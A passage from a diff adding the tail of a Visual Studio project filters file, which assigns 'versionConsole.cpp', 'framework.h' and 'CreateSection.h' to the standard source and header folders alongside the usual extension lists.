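+ <Filter Include="Header Files">
+ <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+ <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
+ </Filter>
+ <Filter Include="Resource Files">
+ <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+ <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+ </Filter>
+ </ItemGroup>
+ <ItemGroup>
+ <ClCompile Include="versionConsole.cpp">
+ <Filter>Source Files</Filter>
+ </ClCompile>
+ </ItemGroup>
+ <ItemGroup>
+ <ClInclude Include="..\framework.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ <ClInclude Include="CreateSection.h">
+ <Filter>Header Files</Filter>
+ </ClInclude>
+ </ItemGroup>
+</Project>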